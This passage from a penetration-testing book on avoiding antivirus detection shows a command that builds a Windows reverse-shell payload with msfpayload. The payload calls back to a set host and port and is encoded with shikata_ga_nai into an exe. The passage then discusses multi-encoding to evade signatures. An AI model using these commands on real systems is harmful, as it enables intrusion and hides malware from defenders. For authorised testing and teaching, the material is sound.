Avoiding Detection

103

Now we’ll run a simple encoding of an MSF payload by importing raw 

output from 

msfpayload

 into 

msfencode

 to see how the result affects our anti-

virus detection:

root@bt:/# 

msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R  |

msfencode -e x86/shikata_ga_nai   -t exe   > /var/www/payload2.exe

[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)

root@bt:/# 

file /var/www/payload2.exe 

/var/www/2.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

We add the 

R

 flag at   to the 

msfpayload

 command line to specify raw 

output, because we will pipe its output directly into 

msfencode

. We specify the 

x86/shikata_ga_nai

 encoder at   and tell 

msfencode

 to send the executable out-

put 

-t exe

   to 

/var/www/payload2.exe

. Finally, we run a quick check at   to 

ensure that the resulting file is in fact a Windows executable. The response 
tells us that it is. Unfortunately, after the 

payload2.exe

 file is copied over to the 

Windows system, AVG detects our encoded payload yet again, as shown in 
Figure 7-2.

Figure 7-2: AVG detected our encoded payload.

Multi-encoding

When we’re performing antivirus detection without modifying the static 
binary itself, it’s always a cat-and-mouse game, because antivirus signatures 
are frequently updated to detect new and changed payloads. Within the 
Framework, we can get better results through 

multi-encoding

, which allows 

the payload to be encoded several times to throw off antivirus programs that 
check for signatures.

In the preceding example, the 

shikata_ga_nai

 encoding is 

polymorphic

, 

meaning that the payload will change each time the script is run. Of course, 
the payload that an antivirus product will flag is a mystery: Every time you 
generate a payload, the same antivirus program can flag it once and miss it 
another time.